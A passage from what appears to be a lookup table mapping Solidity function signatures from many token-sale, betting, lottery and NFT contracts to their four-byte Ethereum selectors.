"_stake(address,bytes32,uint256)": "0xefbee9b3", "stake(uint256,bytes32)": "0x83c592cf", "rewardRoto(address,bytes32,uint256)": "0x2f2d783e", "releaseRoto(address,bytes32,uint256)": "0x7515b84a", "setEmergency(bool)": "0x0501d556", "canStake(address,uint256)": "0x2afbbacb", "rewardRoto(address,uint256)": "0xaf8b0ec7", "stakeRoto(address,bytes32,uint256)": "0x362f8833", "destroyRoto(address,bytes32)": "0x3cc136e0", "releaseRoto(address,bytes32)": "0xd560f696", "setManagerContract(address)": "0x57895ca2", "SOLARCHAINToken(string,string,uint8,uint256)": "0x6d493bf9", "BitcoinZ()": "0x5ba0cd78", "setSolver(address)": "0x1f879433", "LivepeerVerifier(address,address,string)": "0x41bc0b6a", "LTYP()": "0x6594479f", "BEXP()": "0x99a44e68", "H4D()": "0x462c1bff", "selfDestroy(address,address)": "0xebf76522", "processFundsIfAny()": "0xecbbcdda", "buyTokens(uint256,uint256,address)": "0xc1687877", "buyPhaseTokens(address)": "0x9920ecb8", "releaseTokens(address,uint256)": "0xf40d71f1", "setIco3Tokens(uint256)": "0x2f88ae5f", "setIco2Tokens(uint256)": "0x21499737", "setIco1Tokens(uint256)": "0x9aa287d9", "TreasurerToken()": "0x2132eb23", "_adjustSupply(address,uint256)": "0xfdc69291", "adjustSupply(uint256)": "0xbc3574d4", "setMaxTokenSellAmount(uint256)": "0x9c4e0f52", "setApprovedContracts(address,bool)": "0xd09fb45e", "GoForLaunch()": "0x788d135b", "makeInvestment(address,uint256,address,address,uint256,uint256,address)": "0xf2c4c45d", "transfer_token(address[],uint256)": "0x0e351605", "propheciseExecute(address)": "0xa2d1cf11", "useKey(address,uint256)": "0x45fe5aea", "enter(bytes8)": "0x3370204e", "SokToken()": "0x4bb2e417", "SerchUserPurchase(address,address)": "0x2055c2ff", "SearchIPR(string)": "0x4ddddd4c", "SetIPR(string,string,address,string,string,uint256,string)": "0xa37a778f", "setFile(string,string,uint256,string)": "0x30288f03", "mutiSendCoinWithDifferentValue(address,address[],uint256[])": "0x665de19b", "mutiSendCoinWithSameValue(address,address[],uint256)": "0x2e14ef92", "mutiSendETHWithSameValue(address[],uint256)": "0x3a11aa20", "mutiSendETHWithDifferentValue(address[],uint256[])": "0x2949b11d", "sendEth(address[],uint256)": "0xfeaf653d", "coinSendDifferentValue(address,address[],uint256[])": "0xe88390aa", "coinSendSameValue(address,address[],uint256)": "0xa400be54", "ethSendDifferentValue(address[],uint256[])": "0x8602c8d3", "ethSendSameValue(address[],uint256)": "0x20fa6fd9", "setTxFee(uint256)": "0xf05d16f7", "setVIPFee(uint256)": "0x3d06242a", "isVIP(address)": "0xf4201c3c", "removeFromVIPList(address[])": "0xf48d11af", "addToVIPList(address[])": "0xc8813ffd", "registerVIP()": "0x9c1f6133", "fishySalmonToken()": "0x045ea88a", "keccak256calc(address)": "0x01281867", "sendTransaction(bytes32,uint256,int256)": "0xc2ae1a53", "sendTransaction(address,uint256,int256)": "0x94c9b647", "namehash(bytes32)": "0xdd9d687e", "SoSoCoin()": "0xd6d1fc2a", "OrphanWalefareToken()": "0x5c511a2a", "Nguen()": "0x6e4a9f4d", "ERC223Token(uint256)": "0x50636a68", "TestToken(uint256)": "0x8ea69e37", "getTokensFromAddressEmits(address,address)": "0x5de7e350", "getTokensFromAddressReturns(address,address)": "0xac97ad89", "getMyTokensEmits()": "0x458d5968", "getMyTokensReturns()": "0x25052d02", "winTokens(uint256,address)": "0x1f078f56", "sendTokens()": "0xe47112bd", "getTicketByHolderId(bytes32)": "0x2287dad2", "buyTicketByOther(uint256,bytes32,bytes32,bytes32,bytes32)": "0xd6a0dec5", "buyTicketByEth(uint256,bytes32,bytes32,bytes32,bytes32)": "0x5105df3b", "updateHolder(uint256,bytes32,bytes32,bytes32,bytes32)": "0x697952af", "addAllNewTicket(uint256,bytes32[],uint256[],uint256[],uint256[])": "0x5f07a3e5", "addNewTicket(uint256,bytes32,uint256,uint256,uint256)": "0xff2b247f", "updateTicketStructure(uint256,bytes32[],uint256[],uint256[],uint256[],uint256[],uint256[])": "0x4b33eac2", "addNewEventToBusiness(uint256,address,string,string,uint256,uint256,uint256,uint256)": "0x6935a0d0", "Bomx()": "0x706ed71b", "removeSkipPrice(uint256)": "0xa4c5bf66", "addSkipPrice(uint256)": "0xad3c8b22", "changeDeveloperTemplateAmountLimit(uint256)": "0xcb0195ee", "changePlatformWithdrawAccount(address)": "0x96b2c923", "changeDiviRate(uint256)": "0x4f09cfc5", "queryUserContractCount(address)": "0x049abf89", "queryUserContract(address,uint256)": "0x1f77aac0", "queryPublishedContractTemplate(uint256)": "0x7a476a42", "publishContractTemplate(uint256,string,address,string,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x923b3e75", "returnOfIncome(address,uint256)": "0xa868378b", "generateContract(uint256,uint256)": "0x7cb6a6b2", "ContractFactory()": "0x5f4821ab", "generate(address,address,uint256)": "0x6bec51cc", "replyThread(uint256,string,string)": "0x7cdcc514", "createThread(string,string)": "0xcb1650b4", "isKill()": "0xc7ef47d7", "MARXToken()": "0x784fcb94", "myTokens(address)": "0xdc1df3f6", "setNFTbyTokenId(uint256,string,bool)": "0xdd819721", "getNFTbyTokenId(uint256)": "0x0dbedee7", "createToken(uint256[],address)": "0x03a76fed", "destruirContrato()": "0xf07b4608", "LoveToken()": "0x26c9959f", "returnTokensAll(address)": "0xf19c020d", "RashidToken()": "0x90b6f7e6", "updateGuMasks(uint256,uint256,uint256)": "0xf7e95364", "updateKeyMasks(uint256,uint256,uint256,uint256)": "0xcf44f5f7", "distributeExternal(uint256,uint256,uint256,uint256)": "0x8e7cd5a7", "randomNum(uint256)": "0xd63587a2", "updateReferralGu(uint256)": "0x777955b1", "updateGenGuVault(uint256,uint256)": "0x3cc54aae", "pay500Winners(uint256)": "0xfa9907ad", "calcUnMaskedGuEarnings(uint256,uint256)": "0xba1b6221", "calcUnMaskedKeyEarnings(uint256,uint256)": "0xfc3d9f9f", "stealTheLeek()": "0x753117ff", "leekStealGo()": "0xc1cc6958", "updateGuPhrase()": "0x5ca26ff9", "updateReferralMasks(uint256,uint256)": "0x8b12c25f", "updateGuReferral(uint256,uint256,uint256)": "0x9af3352d", "core(uint256,uint256,uint256,uint256)": "0xcb3687df", "buyCore(uint256,uint256)": "0xd53e963b", "updateWhitelist(uint256[],bool)": "0x93fe0237", "LiquidHome()": "0x75dbc1aa", "Test3(address)": "0xd60bf518", "withdrawEtherAll()": "0xac711cbb", "ICO_CONTRACT()": "0x5e715c16", "WorldWifi()": "0xcae96610", "FccToken()": "0xe1bccc7f", "transferIcoship(address)": "0x79e58cfd", "randomJackpot(uint32,bytes32,uint32)": "0xc8eab537", "BIBToken(uint256,string,uint8,string)": "0xc9b4cb94", "BlackNWhite()": "0xeabd9e60", "FrozenGuard()": "0xba124401", "NITRONEUMERC20(uint256,string,string)": "0x0ec3f62e", "EnergyModulationProject()": "0x195e38b2", "tokenDelta(address,address,address,uint256,uint256,uint256)": "0xcb1a7b1d", "GMF()": "0xb181d3d5", "getATitty(uint256)": "0x0a68f374", "calculateBoatFee(uint256)": "0xcad3d24d", "makeItSellable(uint256)": "0xee2ef6ec", "changeName(string,uint256)": "0x270dc9fd", "belongsTo(address,uint256)": "0xda0225db", "getTittyByWpId(address,uint256)": "0x827c1e41", "getLatestId()": "0xeff91c7e", "getAmountOfTitties()": "0x3f5a9e22", "purchaseAccessory(uint256,uint256,string,uint256)": "0x94ebd374", "purchaseExistent(uint256)": "0xf7f59411", "purchaseNew(uint256,string,string,uint256)": "0x1626315c", "TittyPurchase(address,address)": "0xc360c616", "_approveFor(address,uint256)": "0x6b98419a", "createTitty(uint256,string,uint256,address,string)": "0x583b4715", "getAccessory(uint256,uint256)": "0x4a6cfca7", "totalAccessories(uint256)": "0x7465df26", "addAccessory(uint256,string,uint256,uint256)": "0x7100a4e6", "_changeName(string,uint256)": "0x653704b1", "_setTittyForSale(bool,uint256)": "0xc30dafd8", "_changeTittyPrice(uint256,uint256)": "0x827aeb16", "updCouponBonusConsumed(string,bool)": "0x87f74e7c", "getCouponBonus(string)": "0x4c14f334", "balanceAirDropToken(address,address)": "0x12671fb4", "setAirDropToken(address)": "0x32ff6e21", "setCouponToken(address)": "0x6d6a761e", "setDapCarToken(address)": "0x47d289a9", "setWalletWithdraw(address)": "0xb51996de", "getInvestor(address)": "0x8f35a75e", "delInvestor(address)": "0x1df36e63", "updInvestorPreSaleEnabled(address,bool)": "0x890e2a6b", "updInvestorEnabled(address,bool)": "0x22054fe0", "updMinPurchaseLimit(uint256)": "0xb810d24b", "updCouponBonusEnabled(bool)": "0x6d836cde", "updAmountBonusEnabled(bool)": "0xfaa5d0ea", "updAirDropTokenDestroy(bool)": "0x32947122", "updAirDropTokenEnabled(bool)": "0x6c6b9870", "updCrowdSaleEnabled(bool)": "0xa31271f5", "nowPeriod()": "0xc288eeee", "crowdSalePeriodInit()": "0x0c2f6f48", "CrowdSaleDapCar()": "0xccfbdb9e", "burnAirDrop(address[],address)": "0x2c4b27ae", "getCoupon(string)": "0xd5635444", "updCouponConsumed(string,bool)": "0x034fcf55", "CheckTime(uint256)": "0x0c4a3338", "AllotAward()": "0x2fd97c7d", "IsCanAllotAward()": "0xada8e5ef", "transferToContractAddr(address,uint256)": "0x5c0a9b8d", "LotteryRecharge()": "0xda6d8ca4", "Lydian()": "0xba344304", "setPhase1DurationInHours(uint256)": "0xe5734c57", "setMaxContributionPhase2(uint256)": "0x12806653", "setMaxContributionPhase1(uint256)": "0x627eb56c", "setSaleTime(uint256,uint256)": "0xca87e67e", "sendRemainingTokens(address)": "0x8ca10f9b", "sendCollectedEther(address)": "0x03af73d3", "CHXTokenSale()": "0xdd5cba71", "setWhitelistAdmin(address)": "0xa8d49e64", "drainStrayEther(uint256)": "0x42bf41ae", "batchDecreaseApproval(address[],uint256[])": "0x652dad7b", "batchIncreaseApproval(address[],uint256[])": "0x24f07356", "batchApprove(address[],uint256[])": "0x3e11b765", "batchTransferFromManyToMany(address[],address[],uint256[])": "0x41e18398", "batchTransferFromMany(address[],address,uint256[])": "0x380e809e", "batchTransferFrom(address,address[],uint256[])": "0x4885b254", "setRestrictedState(bool)": "0x72e496f3", "setTokenSaleContractAddress(address)": "0x95ef9178", "CHXToken()": "0x97ac3b51", "Recycle()": "0x25dd495a", "FunFaceToken()": "0xfa9ba8b4", "maxTransferAmount(uint256)": "0xbbc5aa5b", "restrict(bool)": "0xd8774d99", "setTimeFrame(uint256)": "0x0fbad611", "OCTWasteToEnergyJV()": "0x87b5c21f", "setAmbassadors(address,bool)": "0xf4cb09cf", "PowX()": "0xd464520c", "Bitcoin_IDToken(uint256,string,uint8,string)": "0xa32ac9e1", "X5Coins(uint256,string,string)": "0xed644025", "create(uint256,uint256,uint256,address,address)": "0x355421a8", "setSecurityCheck(string)": "0x03ca71d6", "getLastContract()": "0xc53833fe", "setEarlyBirdDuration(uint256)": "0xbcb0f541", "NtsToken()": "0xaf22fd8e", "ponziToWei(uint256,uint256)": "0xf6db6e50", "calcInterestRateNumerator(uint256)": "0x5146585a", "nextLevel()": "0x3efb760d", "calcOutput(uint256,uint256)": "0xf37cc477", "newPlayer(address,uint256,address)": "0x7b26de4b", "getUserBettingInfo(address,uint256)": "0x4ebfa8bc", "getLotteryInfo(uint256)": "0x76b3c8a8", "createUserLottery(uint32,uint32)": "0x571b0227", "_getLotteryNum(uint256,uint256)": "0x5e90a9ff", "saveLottery(uint32,uint256,uint256)": "0x75765249", "CreateLottery(uint32)": "0x4e153418", "getOraclePrice(string)": "0xf5a908f0", "makeRecorderID()": "0xee1879ef", "getEvaluationByStudentID(uint32,uint64)": "0x2f599242", "getEvaluationByRecorderID(uint32,uint64)": "0x9366fd5c", "getEvaluation(uint64)": "0xba8ef244", "getEvaluationCountByStudentID(uint32)": "0x3a95152d", "getEvaluationCountByRecorderID(uint32)": "0x3862e6ee", "getEvaluationCount()": "0xcff07771", "recordEvaluation(uint32,uint32,uint8,uint8,uint8,uint8,uint8)": "0x8ac3ea2c", "getRecorderAddress(uint32)": "0xcbf9b6dd", "getRecorderID(address)": "0x3e88d93b", "makeStudentID(bytes)": "0x35acbcab", "getStudentIDText(uint32)": "0x2997ec89", "getStudentID(bytes)": "0xe6a0525f", "GradeBook()": "0x0d67d01b", "showDelegateMsgSender(address)": "0xff238839", "deleteArray()": "0xe9cafac2", "showArrayLength()": "0xbf37689c", "PlayingCrypto()": "0x9397afcb", "setAirEndtime(uint256)": "0x8cefad63", "setMystr(string)": "0x7d5fbcab", "getMystr()": "0xa7c6c83a", "VCT()": "0x3c4ec769", "_create(address,uint16,uint16,uint8)": "0x06132b38", "galleassetTransferFrom(address,address,uint256)": "0x7a2a3931", "FGCToken()": "0x94cf9b1b", "doesProofExist(uint256,string,string,uint256,bytes32)": "0xeedd1dd3", "notarizeHash(uint256,string,string,uint256,bytes32)": "0x5d66d73f", "DistributedCreditChain()": "0x18def2a1", "credexx(address,address,address,uint256,uint256,uint256)": "0x70011870", "setOraclizeTimeTolerance(uint256)": "0x554600fa", "setIgnoreRequestIds(bytes32[],bool[])": "0x8a62e9e9", "schedulePriceUpdatesRolling(uint256,uint256,uint256)": "0xc21afe12", "schedulePriceUpdatesFixed(uint256[])": "0x9b4bb9f0", "VelesCoin()": "0xf1ade50c", "showSmallProfit()": "0x8a36ebc2", "getParticipateName(uint256)": "0xf37bf1be", "getBetAmountOf(uint256,uint256)": "0xa2f7f58f", "getUserBetOf(uint256,address,address)": "0x06bbbeff", "getUserBetsLength(uint256)": "0x8271bedc", "getUserBet(uint256,uint256)": "0x5a992188", "getBetLength()": "0x0d8053ca", "getBetName(uint256)": "0xdbb8a305", "getDisableBet(uint256)": "0xe8f09e24", "setDisableBet(uint256)": "0xbe92ccfd", "sendWinnerPriceToAll(uint256,uint8)": "0x3a035edf", "getTotalAmountOf(uint256)": "0x838f7f94", "getCampaignLength(uint256)": "0x56640afe", "agreeBetWinner(uint256,uint8)": "0x99c8fcba", "createBet(uint256,uint256,uint256,bool,string)": "0xf74b766a", "takeBet(uint256,uint8)": "0x7875d41b", "Criptomedicina1()": "0xb2a29615", "DMBToken()": "0x4238b84c", "HeliumToken()": "0xd79e5de8", "transferTemp(address,uint256)": "0x7c1e5ced", "playersLength()": "0xd2079c0f", "returnMoney()": "0x93119312", "payMoney()": "0x1dc1c5e3", "winnersLength()": "0x3b52f2be", "test(string)": "0xf9fbd554", "addUser(uint256,uint256,uint256,string,string)": "0xca74124c", "depositMoney(string)": "0x2b8f7a49", "KBV01()": "0x324c6add", "draw(address[])": "0x25f262c7", "addString(string)": "0x9874f5d7", "judge(uint256,address)": "0x7494ad81", "record(address,uint256)": "0xc6685617", "TokenDemo(uint256,string,uint8,string,address,address,address,address)": "0x66a200ba", "_getRNGValue(uint256)": "0x5e68d459", "_getRacerCar(uint256)": "0xaeb00fda", "_raceOpened(uint256)": "0xe7105795", "_updateRaceWinner(uint256,uint256)": "0x6d069c10", "_unpackRaceFinishData(uint256)": "0xc16959b2", "_unpackRaceData(uint256)": "0xaffcce10", "_packRaceData(uint256,uint256,uint256,uint256)": "0xa85c06b7", "_unpackPlayerData(uint256)": "0x635639b4", "_packPlayerData(address,uint256)": "0xcf16b4a2", "_purchaseWhaleCard()": "0x13d4c63a", "_purchaseCompany(uint256)": "0x6326cb5b", "_purchaseMake(uint256)": "0xd7365f9b", "_purchaseCar(uint256)": "0x701e5e71", "_unpackMakeData(uint256)": "0xe8f1dc9a", "_packMakeData(address,uint256,uint256)": "0x7f848ccb", "_unpackItemData(uint256)": "0x4dab63ff", "_packItemData(address,uint256)": "0x304c69ed", "_oldOwnersOf(uint256)": "0x1b9bfa3a", "_transferCar(address,uint256)": "0x93602379", "_pay(address,uint256)": "0x486de794", "_transferCard(address,uint256,uint256)": "0xe25bc771", "_released(uint256,uint256)": "0x19f3edec", "_priceOf(uint256,uint256)": "0x7355303e", "_editPriceOf(uint256,uint256,uint256)": "0x950cb89e", "editCuts(uint256[6])": "0x6d8758c7", "addAd(address,uint256,uint256,uint256,string,string)": "0x7f09171b", "Aliencoin()": "0x6465d25a", "GAMToken()": "0x997f51e6", "DigiWillToken()": "0xfab9f0c4", "XENTToken()": "0x309d9358", "userAtIndex(uint256)": "0xeb06980f", "isSignedUp(address)": "0x22b6ffca", "signUp()": "0xbf96ae63", "setSignUpOnOff(bool)": "0x1a3e42d0", "signUpOn()": "0x6fcb4463", "DPIcoWhitelist()": "0x93efbdbb", "GlobalBusinessSystem()": "0xc1b0510a", "Blocksale(uint256,string,uint8,string)": "0x22ccd000", "RSC()": "0x4611fb0e", "getEnabledTokensInformation()": "0x67141690", "getEnabledTokensLength()": "0x9891d61c", "tokenEnabled(uint256)": "0x9051d18a", "disableTokens(uint256[])": "0x1b7ce6f3", "setTokenPrices(uint256[],uint256[])": "0xf560aa57", "getOwnedTokensIds(address)": "0x27066ebb", "setTokensQuantity(uint256[],uint248[])": "0x5937e86a", "isMintableNFT()": "0xf119fcaa", "setAuthorizedMinter(address,bool)": "0xed58bad8", "Tratok()": "0x0b4db63a", "KRT()": "0xc315a082", "changeMiniumBet(uint256)": "0x7ad9642f", "withdrawCommissions(uint256)": "0xcc373d79", "changeFees(uint8)": "0x41771b62", "claimBet(uint8,uint8)": "0xf83a4c8a", "cancelBet(uint8,uint256)": "0x8e66da2f", "getBet(uint8,uint256)": "0x1faec182", "getMatchBettingDetails(uint8)": "0xb5957288", "getMatch(uint8)": "0x23d808da", "getNumMatches()": "0xf72d53ba", "cancelMatch(uint8)": "0x3640f613", "addMatch(string,string,string,bool,uint8,uint8,uint256)": "0x8612ee13", "proxy_contribution(address)": "0xb00791fa", "setopVaultAddr(address)": "0x3b7169fb", "settrusteeVaultAddr(address)": "0x002ce636", "setmmVaultAddr(address)": "0xd5aa1aca", "setr2VaultAddr(address)": "0x501bae76", "setrteamVaultAddr(address)": "0xbc978361", "setdteamVaultAddr4(address)": "0xb54b1187", "setdteamVaultAddr3(address)": "0xc4a8b570", "setdteamVaultAddr2(address)": "0x7a3eeb57", "setdteamVaultAddr1(address)": "0x5986ce23", "setMaxStage3AllocationPerInvestor(uint256)": "0xa6dc1ada", "setMaxStage2AllocationPerInvestor(uint256)": "0x0f6c2a33", "setMaxStage1AllocationPerInvestor(uint256)": "0xcf3d82e5", "setMaxPreCrowdAllocationPerInvestor(uint256)": "0x4a9f6d4a", "setInvestorsBatchSize(uint256)": "0x81ae20b2", "multiAirdrop(address[],uint256[])": "0xd735dc92", "process_contribution(address)": "0x981dd797", "do_grant_tokens(address,uint256)": "0xc32a9b00", "emergencyFinalize()": "0x93ce9791", "finalizeCampaign()": "0xa1211bc0", "allocateInvestors()": "0xdfd024c1", "setMultipleParticipantWhitelist(address[],bool[],uint256[])": "0xbbeb76bc", "setParticipantWhitelist(address,bool,uint256)": "0x7122e857", "TokenCampaign(address,address,address,address,address,address,address,address,address,address,address)": "0x29c886bf", "generate_token_for(address,uint256)": "0xa16fa142", "setGenerateAddr(address)": "0x6177fa04", "EatMeCoin(address)": "0x26faf9c2", "DAX()": "0x3bd89deb", "getSplitCount(string)": "0x32b65a95", "getPlayerDiscount(address)": "0x50512420", "getPlayerBets(uint256,address)": "0x2a50097b", "getFee(address)": "0xb88c9148", "setStorageOwner(address)": "0x1f8864ac", "setPayoutLimit(bool)": "0x2f3b5603", "setDiscountForPlayer(address,uint256,uint256)": "0x80daa1c6", "setContractMessage(string)": "0x0c75941a", "payPlayers(uint256,uint256)": "0x13c03159", "getLineStat(uint256)": "0x78f08f2e", "getMyDiscount()": "0xe919ca10", "getMyBets(uint256)": "0x76e20e53", "cancelLine(uint256,string)": "0x80017cbc", "bet(uint256,uint256)": "0x6ffcc719", "addSomeOfManyLine(uint256,string,uint256,string)": "0x0f8ea4f3", "addThreeWayLine(uint256,string,uint256)": "0x95a1c14d", "addEvent(uint256,string)": "0xffdd108b", "addDoubleChanceLine(uint256,string,uint256)": "0x25ab9f43", "BettingCore()": "0x18342c9c", "submitResult(uint256,uint256[])": "0xa826ee78", "startPayments(uint256,uint256)": "0x5e7cafa4", "setLineStartTime(uint256,uint256)": "0xe03c1c4b", "isBetStorage()": "0x3d9aeef0", "getPlayerBet(uint256,uint256,address)": "0x58d8f76f", "getLineSum(uint256)": "0xd143dad0", "getLineData2(uint256)": "0x5ae9c4d8", "getLineData(uint256)": "0x465e920e", "getBetPool(uint256,uint256)": "0x7f08ea8b", "cancelLine(uint256)": "0x17d51877", "addBet(uint256,uint256,address,uint256)": "0xd046065e", "ASTBToken()": "0x157e2063", "getLambo(uint256)": "0xefbbbd65", "EtherLambosCore()": "0x18d0c322", "withdrawTuneBalances()": "0x70ff6325", "setServicestationAddress(address,address)": "0x89281963", "bulkCreateLambo(uint256,address,uint64,uint256,uint256)": "0xf28f0f6a", "createLambo(uint256,address,uint64)": "0x09ca60c1", "vault_wallet()": "0xea7553f0", "total_pay_claimed()": "0x7ddb3c00", "tom()": "0xce266af8", "presaleStarted()": "0x04549d6f", "DEEM()": "0xe720b4a7", "tokenSEEDcap()": "0xd4b2931c", "setOnlineTime()": "0x5c0252fe", "usersRegistered()": "0xa81077a7", "transfer_remaining_funds_to_project()": "0x3332f720", "tdeActive()": "0x03a5c8e7", "walletE()": "0xc5c9f617", "auctionWinnerMessageHash()": "0xa9de581b", "MAX_ALLOWED_PRE_SALE()": "0xebd66a9c", "minAmountPresale()": "0x0d6f849b", "betsNum()": "0xf8347242", "commission_system()": "0xf6288422", "tBonusStageEnd()": "0x31de13e8", "campaign()": "0x811e539c", "db()": "0x4d655aff", "TOKEN_FUTURE_CAP()": "0xb46eeebb", "gasonBuffPercentage()": "0xd5425571", "startEpochTimestamp()": "0x125d5d71", "MINIMUM_PURCHASE_AMOUNT_IN_WEI()": "0xd4d90bd5", "cooloffIncrement()": "0x7f0da94e", "InterfaceSignature_ERC721Optional()": "0x624de3d9", "_mineableSupply()": "0x0e8c0cdd", "totalBids()": "0x8b034136", "pauseEmergence()": "0x79162aeb", "novaAddress()": "0x89f12ed9", "NO()": "0x0d483442", "airDropStage()": "0x46a5bf0c", "dynamicCeiling()": "0x5a3c8826", "lastBlockClaimed()": "0xf4d218f9", "level_9_amount()": "0xa655fb4e", "getListTempHolders()": "0xeda23f20", "kingdomCreationFeeWei()": "0xa1c448f1", "GDCAcc02()": "0xd76dc656", "lastBlock_v16Hash_uint256()": "0x455ff9a4", "whitelistRate()": "0xd3382a55", "PREMIUM_SALE_PACK_COUNT()": "0xb49593fe", "TOKEN_ICO1_LIMIT()": "0x1b118984", "SYSTEM_CREATION_LIMIT()": "0x76c2c296", "totalEarlyInvSupply()": "0x8a51d0fc", "tokenSaleMax()": "0x427982f2", "initialPrizeBov()": "0x669a55ec", "firstVestStartsAt()": "0xcaee3305", "circulatingSupply_()": "0x02d3bd16", "playerTempReward()": "0xe5a252b1", "centralBankAddress()": "0x4ffc9204", "privateWallet()": "0x27c6c720", "creatTokens()": "0x5e3b456c", "MAIN_QUESTION()": "0x7db724b6", "lockedInBets()": "0xdf88126f", "checkIfAllALCDistributed()": "0xd9300e30", "THRESHOLD4()": "0x21f8dab6", "tgeIssuer()": "0x2ba7fc87", "weiUsdRate()": "0x4163b5a4", "YOU_BET_MINE_DOCUMENT_SHA512()": "0xce6eaff9", "totalDividendsPerCoin()": "0xefa3dccd", "totalETHLimit()": "0x0e4b10b6", "periodPresale()": "0x9d1acead", "chunk1IsAdded()": "0x0d117d16", "intrepidVoucherSoldCount()": "0x14a3557b", "getAllGiftTemplateIds()": "0x1e70a239", "fstPrivateSalePortionNumerator()": "0xcdb99909", "claimStatus()": "0xae87fc4b", "poolMintRate()": "0x90cad537", "pmtAccount()": "0x8fa5a6e9", "beginTimeTS()": "0xd6820709", "GDCNumber4()": "0x56f10988", "phID_()": "0xf9bffc0f", "snakemasterReq()": "0x271b3e8a", "wholesaleLeft()": "0x36df05bc", "distributionDate()": "0xe34c8dbf", "tier3Rate()": "0x6fe02e98", "preSaleBonus1Amount()": "0x7aaae78c", "rngCallbackGas()": "0xb7970d80", "mintCapInETH()": "0xa49e4540", "marketManager()": "0x41ed2c12", "basicTokensPerEth()": "0x350460f8", "firstRoundPercent()": "0xb7a139bf", "apiUrl()": "0x8367e120", "isStakingPeriod()": "0x813f4db4", "sumHardCapPreICO3()": "0x17b9e89c", "RESEARCH_DEVELOPMENT()": "0x5303a5d7", "GEN0_NO()": "0x73d65c00", "storageStep()": "0xde08f188", "presaleAddressAmountHolder()": "0x4ccbf17b", "RiskPrice()": "0x4de4f479", "CevacFund()": "0x12dd8700", "icoClosed()": "0xd12a0a2e", "remainingPresaleCap()": "0x037101c4", "kyberNetwork()": "0xb78b842d", "FINLAB_PRESALE()": "0xc2b4470c", "pauseNotice()": "0x2ad0a4e9", "EGGS_TO_HATCH_1CRAB()": "0x8ba19d4f", "total_bet_available()": "0x0b6e01db", "firstStageTokensSold()": "0x7e9e4b5d", "UP_winBets()": "0x9ce3f461", "defendFee()": "0x99ee9076", "EpisodeManager(address,address)": "0xb17d8646", "getBranch(uint256)": "0x927a11b6", "changeBranch(uint256,uint8)": "0x7ace58d8", "changeState(uint256,uint8)": "0x6e630649", "StegoCoin()": "0xe381a8d9", "TFTOKEN()": "0x2437160f", "kycVerify(address,bool)": "0x1e9dd927", "LookRevToken()": "0xcfe60c87", "burnCrowdsale()": "0xae31deb9", "FansToken()": "0xf2c1d74e", "ZbzStandardToken(uint256,string,uint8,string)": "0xeb7c6525", "LiveCoin()": "0xf7b578ee", "UBSCoin()": "0xb965817d", "numCandidates()": "0x5216509a", "getContributions(uint256,address,address)": "0x603318ad", "quickSort(uint256,uint256)": "0xe1aca6fb", "listTokenByRank()": "0xe1f51aca", "setRefundable(address,uint256)": "0xf54a2ddc", "propose(address,string,string,string,string,uint256,uint256,uint256,uint256)": "0x58dd0eb1", "reset(uint256,uint256,uint256,uint256,uint256,uint256)": "0xae487dad", "eXchangeQualityCoin()": "0x573618f3", "getTurtlemasterReq()": "0xcb4be0bb", "getMyTurtle()": "0xc4a8158c", "getFreeTurtle()": "0x46b33e05", "becomeTurtlemaster()": "0x9a62b752", "TurtleFarmer()": "0xe97ed99c", "aliceClaimsPayment(bytes32,uint256,bytes32,address,address)": "0x113ee583", "bobClaimsPayment(bytes32,uint256,address,address,bytes20)": "0xe45ef4ad", "bobMakesErc20Payment(bytes32,uint256,address,bytes20,address,uint64)": "0xb8a15b1d", "bobMakesEthPayment(bytes32,address,bytes20,uint64)": "0x5ab30d95", "aliceClaimsDeposit(bytes32,uint256,address,address,bytes20)": "0x4b915a68", "bobClaimsDeposit(bytes32,uint256,bytes32,address,address)": "0x1f7a72f7", "bobMakesErc20Deposit(bytes32,uint256,address,bytes20,address,uint64)": "0x5d567259", "bobMakesEthDeposit(bytes32,address,bytes20,uint64)": "0xdd23795f", "Bob()": "0x6d877f91", "Molecule(uint256,string,string)": "0x73618371", "IRECToken()": "0x3c3ff394", "TronToken(address,address)": "0x3ec8d571", "MPKToken()": "0xd35d90ba", "BlackSnail(uint256,string,uint8,string)": "0x2dd7ab99", "HydroCoinPresale()": "0x11ab27d2", "addRecToQueue(address,uint256)": "0xfdc4741b", "stopQueueing(uint256)": "0x83a37262", "startQueueing()": "0x563540a2", "PreICO(address)": "0xfcfd3a4c", "feeBips()": "0xd22290a4", "minNumber()": "0x55b93031", "maxBet()": "0x2e5b2168", "minBet()": "0x9619367d", "totalWagered()": "0x8a14f12c", "numRolls()": "0xf19798ab", "numUsers()": "0x19a50f49", "computeResult(uint32,uint32)": "0x83586713", "computePayout(uint256,uint256)": "0x840b7403", "effectiveMaxBet()": "0x45279c81", "curMaxBet()": "0x8bb7819f", "_errorAndRefund(string,uint256,uint8)": "0xd6370149", "_validateBetOrRefund(uint8)": "0x03975d1f", "payoutPreviousRoll()": "0x3892be14", "roll(uint8)": "0x6bf0f4a1", "changeSettings(uint64,uint64,uint8,uint8,uint16)": "0x5b5bbb31", "getAdmin()": "0x6e9960c3", "bankrollerTable()": "0x42d1f17f", "bankrolledBy(address)": "0x4949d9fa", "bankrollAvailable()": "0x01a413b9", "profitsTotal()": "0x9f0f78ca", "profits()": "0x2b36a657", "getWhitelistOwner()": "0xb94371ec", "getCollateral()": "0x5c1548fb", "sendProfits()": "0x5acfefee", "removeBankroll(uint256,string)": "0x6c85c727", "addBankroll()": "0x148105ab", "getTreasury()": "0x3b19e84a", "profitsSendable()": "0xeb60082b", "issueDividend()": "0x506aaede", "addresses()": "0xda0321cd", "has(address,address)": "0xf9c926c1", "balances()": "0x7bb98a68", "subtract(address,address,uint256)": "0x6ae4feed", "add(address,address,uint256)": "0x551f8e2a", "toggleTokenExchange()": "0x48a0fa29", "toggleReceiveEth()": "0x626ebe39", "setPreMineAddress(address)": "0x75dd82b8", "setTokenAndRate(uint256,uint256)": "0x2736f6d9", "changeTierController(address)": "0x6601345c", "handleTokensFromOtherContracts(address,address,uint256)": "0x471ab294", "updateFeeAmount(uint256)": "0x9ea55bb0", "safeWithdrawal(address,uint256)": "0xd34dd1f0", "payFeesToggle()": "0xc42edd61", "changePreMine(address)": "0x03ca30e0", "changeDevFees(address)": "0x1794a463", "withdrawDevFees()": "0x0da590d4", "removeExchangePartnerTargetAddress(address)": "0xf4ed216c", "canContractExchange(address)": "0xe4246ad2", "addExchangePartnerTargetAddress(address)": "0x53e1509c", "setFiatPerEthRate(uint256)": "0xfa36316e", "requestTokensFromOtherContract(address,address,address,uint256)": "0x0587c1ba", "allocateTokens(uint256)": "0xf0204007", "convertEthToCents(uint256)": "0xc03d848c", "premine()": "0x9e69f2bb", "ETHERCFeeModifiers()": "0xf4500eb5", 